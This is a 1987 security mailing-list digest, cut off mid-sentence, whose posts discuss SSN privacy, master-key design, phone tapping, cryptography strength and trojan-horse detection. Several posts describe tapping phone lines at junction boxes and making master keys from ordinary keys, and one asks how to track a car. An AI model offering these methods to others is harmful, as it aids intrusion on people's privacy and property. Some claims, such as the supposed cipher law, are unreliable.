Continued I have been reading the news about Social Security numbers (and the giving out thereof) with interest. I guess the newsgroup is successful, as I now ask for a reason when someone asks for my SS Num. I saw something in a campus paper today in which an advertiser wants a SS number, but also provides an out. The ad is for purchasing computer software at an educational discount.: [in the directions] "Make a photocopy of your current Student ID or Faculty card and...some well known form of id. displaying your Social Security number,... (WPCORP will hold this information strictly confidential and use it only to guard against duplicate purchases.) [Then later on...] If you have serious reservations about providing a social security number, call Educational Development...to establish clearance to purchase any of the above sofware products..." In the world where it is difficult and inconvienient at best to not automatically provide the SS number when asked, I thought this was a nice change. Thomas Lapp From: djw@LANL.GOV (David Wade) 25-Sep-1987 12:03:28 To: Security@RED.RUTGERS.EDU Subj: [668] Re: Digest of SSN responses > To my knowledge, the Privacy Act applies only to the Federal > Government and to contractors operating on its behalf. Is this not > true? I don't believe it is illegal for a university to use a student's > SSN as his/her student id. The Privacy Act is written specifically for Federal Agencies, Subcontractors, and Universities. There is no University which does not accept federal money. Call your congressman's office and get a "free" copy of the Privacy Act of 1974 quickly; before Bork invalidates what's left. 8*) Dave From: Mike Linnig 26-Sep-1987 23:23:15 To: security@RED.RUTGERS.EDU Subj: [660] RE: Telephone tapping via the isolation box There are multiple places that your line COULD be tapped. If I was going to do it for short amount of time I'd go up the road from your house and tie in at one of those telephone junction boxes. The telephone person would spot it in a second, but it would be good for a week or so on the average. The real problem with that technique is that you would have to figure out which line is yours. But if you were a mafia Don, at least I don't have to walk up to your house (grin). Mike Linnig From: mason@oberon.lcs.mit.edu (Nark Mason) 29-Sep-1987 09:43:46 To: paul@uxc.cso.uiuc.edu, security@RUTGERS.EDU Subj: [885] Re: Telephone tapping via the isolation box Don't worry, your phone lines still are not safe. Many years ago (when I was young and irresponsible...) I amused myself a few times by sitting in the bushes near my house at a unlocked telco junction box looking for a friends data line. Didn't find it, but I did hear some interesting stuff and caught a guy trying to break into a nearby church (I wouldn't tell the police where I was phoning from). Failing this I went to his house, clipped my handset into the wires outside his house and plugged a tape recorder in. In a relatively large city like Newton the CO's (Company Offices?) were manned 24 hours a day, in smaller citied they aren't and noone's too concerned with keeping people out of them. From: *Hobbit* 28-Sep-1987 23:15:29 To: security Subj: [2275] Caving Horror Stories (III) [This came over another mailing list -- I couldn't resist. Is *your* town's sewer system a threat to national security? _H*] From: commgrp@silver.bacs.indiana.edu Subject: Caving Horror Stories (III) A caver from Austria who recently visited the U.S. told some grim tales about caving in Eastern Europe, especially E. Germany. He's translating _CAVER OF FORTUNE_ into German, with added advice on how to do keep a low profile while caving in E. Europe. East Germany has a law against going underground. Literally interpreted, it says that you must stay out of your own basement. Apparently, the law was enacted after a few people tunnelled their way out of E. Berlin. The government does support sports, however, so caving clubs are allowed. The party tries to plant spies in the cave clubs but everybody knows who they are, so they take them on extremely rough cave trips and thoroughly trash them! Club newsletters are required to contain party-line material about how caving advances the cause of the state; this is usually accomplished by duplicating the same page in each newsletter issue. European cavers explore old mines and tunnels, as well as natural caves. Networks of artificial tunnels are common under old European cities; they are ancient sewers, were used to hide from invaders, etc., and their locations are unknown to present city governments. The cavers in an E. German city (which must remain nameless) discovered an iron door on the river bank, overgrown with weeds. They picked the lock, made their own key, and explored the tunnels. They found treasure which was hidden there during World War II by the local inhabitants, most of whom were killed whe@he city was bombed. Being caught in the tunnels means a one-way ticket to Siberia, so it's the ultimate stealth-caving! Cave locations are state secrets in eastern-bloc countries; some French cavers were caught at the border of Yugoslavia with a roadmap on which they had marked cave locations; they were jailed as spies, and it was three weeks before the French embassy bailed them out. From: weiser.pa@Xerox.COM 30-Sep-1987 12:49:06 To: security@red.rutgers.edu Subj: [454] Re: Simson Garfinkel's article, part 2 of 3 "Examples of secure passwords include ***random, unpronounceable combinations of letters and numbers*** and several words strung together." I do not consider "random, unpronounceable combinations of letters and numbers" to be a secure password. Such a password is extremely likely to be written down. -mark From: jm7@pyr.gatech.edu (John McLeod) 30-Sep-1987 16:02:01 To: AWalker@red.rutgers.edu Subj: [552] Re: Simson Garfinkel's article, part 3 of 3 Over a year ago, the programmers at Sandia National Laboratories used a computer to factor a number that is larger than the standard RSA keys that are in standard use for the banking system. Admitedly, they used a few weeks of CRAY time, but the number was factored. How secure a Public Key Crypto system is depends in part on how valuable the information that is being transmitted is. jm7 From: Mike Linnig 30-Sep-1987 19:57:42 To: securty@RED.RUTGERS.EDU Subj: [825] re: making a master key I'm not an expert but I had a cubemate that studied locks and locksmithing. I think if you could get a couple of other folks keys on your floor, you could determine which parts of the key were common and file the remainder away. I think the general trick is that the tumblers in the lock have a couple of cuts not just one. The master key pushes (one or more) tumblers to this second position. Seems on reflection that there are ways of making master keys that cannot be deduced from looking at non-mastered keys, but I'm not sure every lock maker employs these techniques. (sorry if that rambled a bit, but I'm trying to recall five year old conversations). Mike Linnig From: mason@OBERON.LCS.MIT.EDU (Nark Mason) 30-Sep-1987 22:29:29 To: jh@VENUS.MIT.EDU, security@red.rutgers.edu Subj: [1150] Re: ssn's I guess if you have something to hide from people that are looking for info about you you can just give them a bogus number instead. If someone asks you your number and you say "I refuse to tell you" it will make them wonder. If you say "934-28-3546" they will write it down, no questions asked, no sweat. Your being worried about being reduced to a number in a computer sounds kind of silly to me. How does VENUS.MIT.EDU refer to you? By your UID. You say you have a username? Surprise! You're 106 104 @ 18.83.0.117. Do you find this morrally offensive? If you make people use your name instead of a number it's just packed decimal instead of binary. If you don't want to be a number you'll have to refuse to let them enter you into a computer. The whole point of people using your SS# is each person already has a unique one so they don't have to give you one. It just makes life easier. Your point up there ^^ that refusing to relinquish your number makes things more difficult is valid though. From: jh@VENUS.MIT.EDU (Joe Harrington) 1-Oct-1987 16:43:50 To: mason@OBERON.LCS.MIT.EDU, security@red.rutgers.edu Subj: [1104] ssn's As for giving out bogus numbers and claiming they are my own, I cite a recent article on this list concerning what that does to the ssa and the (legitimate) records they have, and how easy it is for me to correct them. Also, I'm not sure of the legality of falsification on signed documents (like checks and bills of sale) and I'm not into lying to people. Should someone wish to start collecting info about me, that person is certainly not going to walk up to me, identify himself, and say "By the way, what is your social security number?", so I cannot, as you suggest, "just give them a bogus number instead." He will read it off some form my name is on. To hide my number (to avoid giving him a universal cross-reference), I would have had to withhold it from people since I got it. Since I didn't hide it from the beginning, I see little point in hiding it now, as anyone really determined can get it from places I have already given it to. --jh-- From: bruno%csd4.milw.wisc.edu@csd1.milw.wisc.edu (Bruno Wolff III) 30-Sep-1987 18:57:24 To: misc-security@seismo.css.gov Subj: [909] Re: Simson Garfinkel's article, part 3 of 3 You must be very carefull verifying programs to see if they have changed. Often a program can be patched so as to remain the same size by using partially full pages or replacing seldom used routines. On many systems the modification date can also be changed back to the origional date (this is nice when copying files). If you keep another copy of the program to run a diff against it should be hidden so that both the program and the copy aren't changed. Best would be to bring a copy in off some removable media to do the comparison. The medium should only be mounted when the person to do the comparison is there in person. Even then the program for reading the file in or the diff program could have been tampered with. From: cosell@cosell.bbn.com (Bernie Cosell) 1-Oct-1987 03:41:34 To: Subj: [924] Re: Master keys [was "(none)" ] The locks have multiple-segment tumblers. One of the split-lengths are the same in every lock, so that a key that has just those settings will open all of the locks. You use the same idea to have "submasters" and "grandmasters". I don't remember exactly how it typically goes, but if it were me, I'd have the bottommost tumbler splits be the ones for the most wideranging master (that is, the tumbler splits that require the most pushing-up to align and so the largest key height). At least this would mean that (as you suggested) it would take more than just ANY key and a file to make up a master key. /Bernie\ Bernie Cosell Internet: cosell@bbn.com Bolt, Beranek & Newman, Inc USENET: bbn.com!cosell Cambridge, MA 02238 Telco: (617) 497-3503 From: John G Dobnick 2-Oct-1987 00:07:11 To: security@RUTGERS.EDU Subj: [1759] Re: Master/sub-master keying systems Just an observation on what appears to be the "standard practice" of setting up master/sub-master keying systems. The way things are set up where I work, it seems that individual keys have the shallowest cuts. Sub-masters have more/deeper cuts, and master keys have the most/deepest cuts. Now, to my untutored way of thinking (I am not a locksmith), this is exactly the *wrong* way to do things. Conceptually at least, it seems like it is fairly easy to "convert" an individual (single door) key into a sub-master or master with a file. Actually, this is a little stronger than a theoretical approach. I know of people who *have* converted individual office keys into departmental masters. However, this was years ago; the statute of limitations has long run out, and the buildings/doors in question have since been re-keyed. [This paragraph is here for the purpose of "coverin' me behind"! :-) ] Anyway, this whole situation strikes me as gross security risk. I have discussed this issue with our locksmith, but have received an unsatisfying answer. He claims that this is just the way things are done. Well, I don't buy that. Does anyone out there have a good technical reason why master/ sub-master keying systems are done this way? (Ease of implementation is *not* an acceptable technical reason, by the way.) -- John G Dobnick Computing Services Division @ University of Wisconsin - Milwaukee UUCP: {ihnp4|uwvax|uwmacc}!uwmcsd1!jgd INTERNET: jgd@csd4.milw.wisc.edu "Knowing how things work is the basis for appreciation, and is thus a source of civilized delight." -- William Safire From: William Daul / McDonnell-Douglas / APD-ASD 2-Oct-1987 02:08:14 To: dplatt@teknowledge-vaxc.arpa (Dave Platt) Subj: [1357] Re: Anti-dog (and anti-mugger) sprays What I know via a Tear Gas (TG) Class from 6 years ago...HALT! will have no affect on humans (at least DON'T bet on it). The Bakersfield Police said in their city, if you use TG (being certified to carry it) in a situation that results in a court case, if the jury/judge feels that your reaction was justified based on your experiences then you will probably be found innocent. The mentioned a case where a nurse walked across a park late at night to get from the hospital and the parking lot. One night she heard rapid footsteps and was then raped. She became certified to carry TG. On another night she was on her way to her car (finger poised on the TG). She heard someone running towards her...she turned and let them have it! She ran off to call the police to tell them she was attacked. Soon afterward a fellow jogger called the police and told them a crazy woman sprayed him with TG. He then sued. The jury found in her favor saying that anyone that had been in her position with her experiences would have done the same thing. The judge told the jogger to run earlier or find another place to run. End of the fairy tale. --Bi// From: DPickett@his-phoenix-multics.arpa 2-Oct-1987 08:45:38 To: Security@RUTGERS.EDU Subj: [792] SSN profit motives Anyone who has information on you indexed by SSN can sell it, reducing your privacy and possibly reducing their opinion of you so that you are harmed. The very fact that they have the data indexed by SSN means that anything they care to file on you can "travel" very far and fast, and sometimes it is not factual. Mistakes happen, and the first party can clean their files, but they have no power over the persons they copied it to.... Even if the organization collecting the information is not sharing it, the indexing by SSN makes it salable by a thief or future owner. Security, yours and mine, comes from giving out information on a need to know basis. From: tencati@VLSI.JPL.NASA.GOV 2-Oct-1987 15:18:41 To: awalker@red.rutgers.edu Subj: [2976] re: Master keys Well, before I got into the computer biz, I used to work in a hardware store. One of my jobs was re-keying people's locks. The principle of a key is that when it is inserted into a lock, the ridges on the key raise these little pins inside the lock cylinder. If the right key is inserted, the tops of all the pins are flush with the stationary part of the lock which also has a set of pins of various lengths. The best way to describe it is to picture a 2 sets of pins. When you insert your key, the bottom pins rest on top of your key and are pushed up into the top of the lock, against a second set of pins. The lower pins are all different sizes which is why your key has different heights. If all the bottom pins are flush with the top of the lock cylinder, then you inserted the right key, otherwise, some pins will either stick up past the point where the cylinder turns and protrude into the upper cavity preventing the lock from turning, or the pin will not stick up high enough in which case the upper pin which is spring loaded will protrude down into the lower cavity again preventing the lock from turning. A "MASTER KEY" is any old key. The difference is in the upper pins of the lock. Instead of having only one pin in each upper chamber, the upper chamber is fitted with a series of pins with different heights. So there are segments instead of only one pin. If the correct key is inserted in the lock, the bottom pins are all flush and the cylinder turns. If the master key is inserted, some of the bottom pins may be flush. The ones that aren't correspond to a spot where the bottom pin is not pushed up far enough so that the top pin is pushed into the lower cylinder. However because the upper cavity was fitted with different sized segments (called "master pins"), one of the segments is flush with the top of the cylinder and the lock still opens. In order for this to work, the master key must be known, and each lock must be fitted with pins which allow the primary key to work, and then the master pins are put in. Because the top pins have to have a sum-total of a certain length, the segments can be put in any combination allowing more than one key to act as a master. This is why locks can be picked with a hairpin (it's tricky, but it *does* work). All you have to do is lift the pins to the right height and turn. The problem is overcoming the springs which act to force all pins down into the cylinder. Also, if you try a key in a lock, and any of the ridges cause the pins to be raised up such that the lower set of pins pushes up into the upper cavity and the upper pins can't move any higher, the key will not be able to fit any further into the lock, which is why sometimes your key won't fit in someone else's lock. Hope this answered your question. Ron Tencati Jet Propulsion Laboratory From: Mike Linnig 2-Oct-1987 19:30:36 To: security@RED.RUTGERS.EDU Subj: [675] RE: garage frobs talking about the security of garage door openers... My house builder installed my garage opener. He probably also installed the same model in all of my neighbors houses. The garage door is digitally keyed.. there are 256 codes. I once thought of all the fun I could have if I got a one hundred watt linear amp and attached my tiny garage door transmitter to it. Of course I'd have to rig something to cycle through all 256 different codes but that wouldn't take long (grin!) An entire neighborhood with ONE remote control! Mike From: simsong@broadway.columbia.edu (Simson L. Garfinkel) 3-Oct-1987 10:13:57 To: security@RUTGERS.EDU Subj: [1040] Master keys Along the lines of keys and master keys, the system isn't always as good as people make it out to be. When I was in high school, I happened to be a computer consultant at the college across the street, and they gave me a key to open the computer room in the morning. One day, I discovered that the key blank from the college computer room fit into the lock of the highschool computer room (which also had a tendency to be locked in the morning.) Not only did it fit, but it also turned in the lock! After comparing my key with the key of one of the teachers, we figured out what happeend: the college computer room key fit about half of the pins for the high school computer room's "slave" key, half the pins for the "master" key. A real fluke, but it effectively gave me a generic computer room key, for which I was greatful. ................................................................simson From: bzs@bu-cs.bu.edu (Barry Shein) 4-Oct-1987 16:26:00 To: mlinar%poisson.usc.edu@oberon.usc.edu Subj: [1449] Telephone tapping via the isolation box >That is hardly worthwhile. What you have done MAY stop a true amateur, but >wire tapping can be cleanly done anywhere along your phone line. Waitaminute, do we have a case of security-macho here? Maybe he's only trying to protect against the "true amateur"? Remember, the only person that's going to bug his phone is a person with a motivation to do so. More often than not that will be someone w/in the organization who isn't going to expend the resources to hire a pro, but if a pair of alligator clips will do the job, what the hell, right? Years ago I had an office which had a wire-closet for a good portion of the building behind the door. I got curious and began playing with a pair of alligator clips and found a phone line which appeared to be unused. This was useful because my phone line could not dial off-campus while the discovered one could (not long-distance, that took an access code, but even up the corner for a pizza.) [standard disclaimer: this of course was on another planet where such things are encouraged.] If someone had simply put a locked box over it I'm sure I would have never bothered to investigate (unless it was such a dumb lock...but that's a different story.) Let's not make the best the enemy of the good. -Barry Shein, Boston University From: "Robert (Al) Hartshorn" 5-Oct-1987 12:12:39 To: security@RUTGERS.EDU Subj: [1362] Re: Telephone tapping via the isolation box Just a sort note. I retired from the US Army (MI). I inspected sites for security problems (TEMPEST). Just to let you know, there is so meany ways to monitor your PC. We could monitor your phone line at the house, at the pole, at a transmitting site, or even monitor your power lines. There are more ways to do it then one would normaly think about, and alot of the things that one would need can be gotten localy. If you have information that you don't want anyone else to see, filter your power line, put a ground screen on all four walls, floor and ceiling. Ground your PC to a ground point that you can only get to from inside the room, and now place your PC in a sheilded box, with you only access toward the largest mass of your house. This will do for a start. This may sound like a joke, but this is just some of what you would have to do. To me, it sound like to much work and I just don't have anything that I want to prevent anyone from getting so bad. But to secure your phone connection box is not a bad idea for other reasons. You can never tell when someone may connect to it and make a call. Have fun, and don't let this go to your head. Al From: Jeffrey R Kell 5-Oct-1987 14:27:58 To: SECURITY@RED.RUTGERS.EDU Subj: [444] Re: Master keys Not to mention the MASTER-master-key of most large-scale lock systems; if you watch them 'change' locks, a special little 'key' is inserted, turned, and THE WHOLE CYLINDER comes out of the door. 'BEST' (company) locksets work this way (a common supplier of large-scale locksets). /Jeff/ From: John Owens 6-Oct-1987 10:49:33 To: Security Mailing List Subj: [615] Re: Secure phones The most likely reason that the NSA couldn't decipher the multiply- encrypted operating system is that they were looking for text. How would they recognize the "cleartext" when they had it, if what was sent was machine code? I wonder if they believed it when the sender gave them the keys, since it still didn't come out to anything sensible. (Of course, this assumes that it was machine code that was sent, and not source. Glenn?) From: wayner@svax.cs.cornell.edu (Peter Wayner) 6-Oct-1987 21:34:27 To: misc-security@beaver.cs.washington.edu Subj: [604] DES is required by LAW for international communications??? Glenn (Everhart%Arisia.decnet@ge-crd.arpa) writes that all international communications must be sent encrypted by DES by LAW. ---- Is this true? Can anyone confirm, deny, or provide the necessary legal information? I thought you needed an export license to send the DES algorithm across the seas. How can the other side decode message? -Peter Wayner (wayner@crnlcs.bitnet or wayner@svax.cs.cornell.edu) From: murray@andromeda.rutgers.edu (Murray Karstadt) 7-Oct-1987 15:43:42 To: security@red.rutgers.edu Subj: [949] his may be somewhat off the mark for this group but... What we would like to do at our PC lab is leave software and manuls out for easy access by students. These disks are the usual mix of commercial stuff that most PC labs have. The question is: How can we have a relatively open environment and not have the disks ripped off. B. Daltons's and other large book/software sellers use electronic security systems that are supposed not to fry disks. It would be nice to have one of these systems installed at the lab. But most like they cost too much. Does anyone have any experience with on of these systems in a PC lab? Is there a cheaper way of securing disks while maintaning an open access system? Is this another example of my typical brain damage and not at all practical? waiting and hoping for some answers murray From: half@mitre.arpa 7-Oct-1987 17:53:36 To: security@red.rutgers.edu Subj: [1956] phone security It's always amazing to hear the stories floating around about comsec. Now another DES crack story withthe usual cast of characters: a grade student with a PC finds the famed trapdoor, --hidden years ago by a combination code designer past chess grandmaster. The proof is shown to civil servants from Ft. Meade who'se first instinct is to banish the student to a little known military reservation outside Atlanta, Ga. Of course, the officials knows nothing about this and have no comment on the specifics. But the student told his friend, word is out! OK, why not? But I figure this is the tenth such story in the last two years. As I understand it (from what I read in the press, specifically Cryptologia) DES can be attacked brute force; however, it's expensive. Now there is a cost per message were as formerly, the traffic was free to harvest. More traffic, more cost and the result is that you have to divert money from other more important projects to keep brute forcing all those DES messages. So management makes you limit your DES haul in favor of more productive projects. Remember, DES is usually low grade traffic. Your need a lot of it to makes sense of important things, --which is now expensive. Again going back to the press we see David Kahn writting in the Fall 1979 issue of Foreign Affairs " Cryptography goes Public" about intercepting telephone voice traffic. You can read what he says for yourself but basically, the STU-III telephone (described in the New York Times about six months ago) is to help keep government information private, not to help the telephone companies become "secure". I am looking foward to the next DES break story. In fact I may write my own: perhaps a former world war II cryptographer notices an uncanny pattern in s-box number two whose mirror image he sees in the key bits.... From: Phil Benchoff 5-Oct-1987 08:35:04 To: SECURITY@RED.RUTGERS.EDU Subj: [1781] Electronic door locks and anti-shoplifting devices. We have a very neat security system on our computer room here. Authorized people carry cards which are held in front of 'readers' at the doors to gain access. Each card has a number which the security system hands to a computer which determines if the person is currently authorized. The cards are credit card sized with no visible magnetic strip. The center layer of the card looks like a glass-epoxy printed circuit board. You can usually get in the door just by holding your wallet close to the reader. The manufacturer is Schlage Electronics. Does anyone know how this system works? The readers determine a 4-digit(?) number, so it can't be that simple. How expensive is such a system? It is very convenient to have one card that can be used on several doors, saves the cost of re-keying locks if one is lost, and provides an audit trail of who has been where. How about anti-shoplifting systems that work on similar principles? Stores that use them either remove something from a product when it is bought, or pass things over a demagnetizer(?) when they are paid for. I have disassembled several things that I have purchased to look for whatever they put there, but haven't found anything. I suspect that only a random sample or items actually have protection from being carried out. A final note: The two systems must be very similar, because I am told that the computer room card will trip some of the anti-shoplifting alarms. Oh, the joys of being a DP professional. :-) From: Larry Hunter 8-Oct-1987 14:09:41 To: Subj: [2745] RE: Re: Secure phones GE: 1. DES was originally certified, but was designed with a short enough key that NSA could break it by brute force. (It IS a federal law that no cipher may be used for international traffic that NSA can't break, so the permeability of DES follows from reading the relevant US Code sections.) LH: Although the brute force math is easy enough to demonstrate, this legal stuff is news to me! What are the relevant US Code sections? As far as I can tell it isn't in the Foreign Intelligence Surveillance Act, and there is no mention of this in Bamford's the Puzzle Palace. Where can I find either the statute or a detailed reference? GE:I never did hear where in the US code the law I referred to exists; just got the info some years ago from some folks who did work on some spook jobs who were in a position to know. I'm suspicious. According to the Congressional Office of Technology Assement series on Federal Governement Information Technology (3 vols: Electronic Surveillance and Civil Liberties (1985), Management, Security and Oversight (1986) and Electronic Record Systems and Individual Privacy (1986)), the relevant policy documents are the Brooks Act (1965), the Privacy Act (1974), OMB circular A-71 transmittal memo 1, Presidental directive NSC-24, the Paperwork Reduction Act, the Federal Managers Financial Integrity Act, National Security Decision Directive 145 (the biggy: "national Policy on Telecommunications and Automated Information Systems," which sets NSA as the focal point for both military and civilian information security) and OMB circular A-130 -- None of which support your claim that there is statue (or even policy) prohibiting use of a cipher that NSA can't break. The Foreign Intelligence Surveillance Act, which made NSA into a legislated government body doesn't mention it, either. Even the idea is suspect: wouldn't that mean that there was a list somewhere of ciphers that NSA couldn't break?! Doesn't sound like the kind of list I'd want to see passed around. That doesn't mean I don't believe that NSA tries to ensure that it can crack every message, say by getting the key size of DES cut in half. I had an extended correspondence with one of the designers of DES where I convinced him that NSA cut the key size so that it would be vulnerable (you can have a copy of those messages if you are curious). I just don't believe there is any statute that says such a thing, and you should be careful about making any claim that there is. Larry From: ATSWAF%UOFT01.BITNET@WISCVM.WISC.EDU 8-Oct-1987 19:53:01 To: SECURITY @ RED.RUTGERS.EDU Subj: [649] BITNET mail follows Subject: Homing Devices Does anyone know where to conveniently purchase some kind of device to place in a car to track where that car is going? Does Radio Shack have anything like that? How much would everything involved with it cost? And what is a reasonable distance it would work at? Thanks Wendy Fraker University of Toledo ATSWAF%UOFT01.BITNET@WISCVM.WISC.EDU From: paul@uxc.cso.uiuc.edu (Paul Pomes - The Wonder Llama) 10-Oct-1987 21:46:42 To: security@RUTGERS.EDU Subj: [731] telephone tapping My object is not to be secure against professionals or those with excess cash for nifty devices. The "threat" to my privacy are the students in my Explorer post and the local high school students who shop at Radio Shaft. For the money ($3 and a half-hour) I've secured a too easy tap point. Beyond that it's not worth the trouble. The telco people in C-U usually lock the junction boxes. (Have you ever gone up a pole? It's quite stimulating to the adrenals when done illicitly. 'Tis far better to have a lower profile then stimulate that sort of interest in your calls.) -pbp From: mason@OBERON.LCS.MIT.EDU (Nark Mason) 8-Oct-1987 13:18:36 To: AWalker@red.rutgers.edu, jm7@pyr.gatech.edu Subj: [942] Re: Simson Garfinkel's article, part 3 of 3 I recently wrote an RSA encryption algorithm to be used for encrypting banking system audit logs. The software hasn't been delivered yet but we are using 200 digit bignum arithmetic, which when Rivest, Shamir and Adelman wrote their paper in '77 they estimated 3.8 * 10E9 years to factor it. The great thing about RSA encryption is the more secure you want it to be the longer the number you use (and the slower it runs), whereas something like DES always takes the same amount of time to break. The reason banks use numbers small enough to be factored in a couple of (cpu) weeks is that the data is obsolete (and therefore useless) within a week. We have stuck to 200 digit arithmetic because it impresses people more and we don't actually have to use it yet. From: jm7@pyr.gatech.edu (John McLeod) 8-Oct-1987 17:43:27 To: AWalker@red.rutgers.edu, jm7@oberon.lcs.mit.edu, mason@oberon.lcs.mit.edu Subj: [401] Re: Simson Garfinkel's article, part 3 of 3 ~50 digits is fine until someone bothers to break the code the first time. The first time that the key is broken, then the person who has the key has access to all messages as they are sent. jm7 From: jmturn%ringwld.UUCP@CCA.CCA.COM 8-Oct-1987 14:21:37 To: security@RED.RUTGERS.EDU Subj: [1435] Re: master keys Back when I worked for LMI, I had occasion to assist one of our resident amatuer locksmiths in rekeying a lock. The basic goal was to create a secure door for the video room, which would open to my key, and no one else's. LMI used the standard system where your office key was also the front door key. This is a varient on the concept of a master key. Rather than one key opens many locks, this is one lock with many keys. Obviously, you can't use the split-pin idea to make that work, you'd need an almost infinite number of sections in a large building. Instead, the lock only has some subset of the total number of pins (3 pins in a 5 pin system, for example). This makes for an interesting trade off. By definition, all the keys must share a certain number of common pins. Therefore, there is a trade-off. The more pins they share in common (and thus, the more pins on the outside lock), the more secure the outside door is. On the other hand, the less unique pins between keys, the easier it is to gimmick someone elses lock given you have a key. It was VERY easy to gimmick LMI locks... Save Your Vertical Blanking Intervals for Big Cash Prizes! James Turner (The Ringworld Engineer) From: quintus!gregg@Sun.COM (W. Gregg Stefancik) 9-Oct-1987 12:17:02 To: security@red.rutgers.edu Subj: [1162] Master Keys.. Being a recent graduate of the Foley Belsaw Institute's course in locksmithing, I would like to describe the technique for master keying and the way one can make a master key. Most master key systems have 2 or more shear lines. One shear line is for the change key (the key which will open that door only). The second shear line is for the master key. If there are any other additional shear lines they would be for the grand master key, grand grand master key, etc. In a good master key system a change key will not have any of the same depth cuts as the master and the master will not have any of the same depth cuts as the grand master, etc. So there is no sure way of making a master key from any number of change keys. The only way I know of to make a master key is to remove a lock from service and either pick or open the lock with a key then dump the pins and determine how many keys will open the lock. Make all of these keys(proably no more than two or three keys) and see which one opens other locks. Gregg From: webber@brandx.rutgers.edu (Webber) 10-Oct-1987 22:28:22 To: misc-security@RUTGERS.EDU Subj: [1862] Checking for trojan horses (Re:Simson Garfinkel's article, part 3...) > If you keep another copy of the program to run a diff against it should be > hidden so that both the program and the copy aren't changed. Best would be > to bring a copy in off some removable media to do the comparison. The medium > should only be mounted when the person to do the comparison is there in > person. Even then the program for reading the file in or the diff program > could have been tampered with. Actually, best would be to have the ``copy'' on an isolated system. You then detach the ``original'' from the public system and have the isolated system inspect it (but of course, not execute any files that are on it). Just as programs like ``crypt'' can be subverted, so can ``diff,'' ``ls,'' and even ``cat.'' Or things can be done directly in the operating system, e.g., setting it up such that ~cracker/bin is implicitly at the front of everyone's path -- then /bin/crypt will always look just fine (although no one is ever actually running it). Similarly, login shouldn't be handled by a system that can be remotely programmed. Properly done, password modems should be considerably more secure than letting login verification be handled by the ``exposed'' system. Of course, much of the hyper-concern about computer security is misplaced. Traditional security people say you should set up security so that it costs more to break it than it is worthwhile to break. On a computer system, we should probably say that you should set up enough security so that ``system bugs'' cause more problem than ``malicious users.'' Using this approach, many systems are exceptionally secure. ---- BOB (webber@aramis.rutgers.edu ; rutgers!aramis.rutgers.edu!webber) From: obrien@aerospace.aero.org 12-Oct-1987 15:16:40 To: security@RUTGERS.EDU Subj: [2458] Re: Master/sub-master keying systems OK, here's the poop on master/grandmaster systems, from one who was at one time a bonded locksmith. Master/grandmaster systems should not be used unless absolutely necessary. It's like the difference between a system that has a root password and one that doesn't. However, since these are physical systems, the mere existence of the "root password" actually weakens the rest of the security system. Yes, those folks who note the existence of several "splits" in a single pin are correct. That's how the trick is worked. However, note that lock pins are not very large. There is a limit to how close splits can be made, as these mean very thin disks of metal between the splits. These disks wind up riding around the cylinder wall every time either key is used; sometimes on the inside and sometimes on the outside, depending on which break is used. It can sometimes happen that a disk which is too thin will turn sideways in the chamber. Result: lock-out. In addition, the more splits there are in a lock, the easier it is to pick, for reasons I won't bother with here. Now to the question of keys. Remember that a key is just a long metal blade. The deeper the key is cut, the thinner the blade. The thinner the blade, the more likely it is to break off in a recalcitrant lock. Result: lock-out. The answer is then that most keys should be of the thick variety, since the sheer number of key-uses is far larger than the total number of grand-master uses, even if the grand-master is in constant use. So, individual keys get the higher cuts. Of course, you could argue, you could arrange the grandmaster such that some cuts are very high and some are very low. Indeed this is sometimes done, but there are two reasons against it: 1) A low cut in the middle results in a weakened key: it has a "thin spot" and can break. 2) In general, for all keys, there is (or should be!) a limit on the maximum "jump" in height from one cut to the next. Remember, as the key goes in and out of the lock, the pins have to ride up and down. Too great a difference between one cut and the next results in a very steep "roller-coaster" ride for the pins. Unless they are very well-lubricated, this can result in a stuck key. Result: lock-out. Hope this settles the hash of this question! Mike O'Brien From: Clive Dawson 13-Oct-1987 13:06:37 To: security@RED.RUTGERS.EDU Subj: [1342] Unscrambling satellite signals I don't own any sort of satellite reception equipment, so don't really keep up with the latest developments. Prior to this weekend, I had the impression that the signal scrambling being used by most (all?) of the major signal providers was DES-based and basically fool-proof. I believe there was some discussion of this subject on this list several months ago, but don't recall whether the following was covered. A friend of a friend bought a Video-Cypher II box some time ago with the intention of paying a fee to the various providers of signals he was interested in. This weekend I learned that this person obtained a chip for the Video Cypher II box which will unscramble ALL signals at ALL times. The only instructions that were given when this chip was installed were: "Make sure that your box is turned on for at least 8 hours on the first working day of each month." (Presumably to get all the encryption key updates...) So it looks like somebody has actually "cracked" the system. Is this general public knowledge by now? Note that when I say "the system" I do NOT mean DES itself. It sounds to me like this chip most likely exploits a flaw in the key distribution procedure. Clive From: simsong@broadway.columbia.edu (Simson L. Garfinkel) 12-Oct-1987 21:06:47 To: security@red.rutgers.edu, elbows@oberon.lcs.mit.edu, sipb@athena.mit.edu Subj: [805] Request One more request, if anybody can help... I'm doing some research on computer databases used for blacklisting purposes. I've heard of three of them, but haven't been able to get any pointers so far. The three that I've heard of are: 1. A database of oil workers who have filed workmen's compensation claims. 2. A database of people who have sued for medical malpractice. 3. A database of people who have filed complaints against their landlords. If you have any hard references for any of these databases or others, please let me know: simsong@broadway.columbia.edu -or simsong@eddie.mit.edu Thanks. From: Brian A. LaMacchia 12-Oct-1987 23:38:57 To: simsong@broadway.columbia.edu Subj: [615] Request 2. A database of people who have sued for medical malpractice. I remember hearing that this one goes BOTH ways, i.e. there are two lists: one list is for doctors and lists people who have sued doctors for malpractice, and the other list is for patients and lists doctors which have been sued and what the results of those suits were. So while doctors are trying to avoid patients who sue a lot, patients are looking for doctors who get sued a lot (and lose). --Brian From: warren@xanth.cs.odu.edu (Frank F. Warren Jr.) 13-Oct-1987 13:11:00 To: misc-security@mcnc.org Subj: [1223] Re: Master/sub-master keying systems John is correct in his observations concerning deep-cut master key systems. Having earned a living as a locksmith for the past six years I can give a technician's view of master keying. Various sources have held forth for the use of both deep and shallow masters. My mentor in the trade taught me to use as few master pins as possible and shallow master cuts. This relates to the principal of making the system as small as possible while allowing for some expansion. Each master keyed cylinder has 2^N (N= number of master pins) potential keys. The system has 4^N potential operating keys. Given these values the reason for keeping to a small N is obvious. In practice I have found no need to use deep masters and anyone who does so is likely to be following his early training at the hands of a deep master proponent. -- Frank Warren, Jr. Old Dominion University - Norfolk, Virginia warren@xanth.cs.odu.edu Old Arpa: warren%odu.edu@RELAY.CS.NET warren@xanth.UUCP old uucp: {decuac,harvard,hoptoad,mcnc}!xanth!warren Packet: KB4CYC@WD4MIZ From: NESCC%NERVM.BITNET@wiscvm.wisc.edu (Scott C Crumpton) 15-Oct-1987 13:33:00 To: SECURITY@RED.RUTGERS.EDU Subj: [1846] re: Master keys There is a very 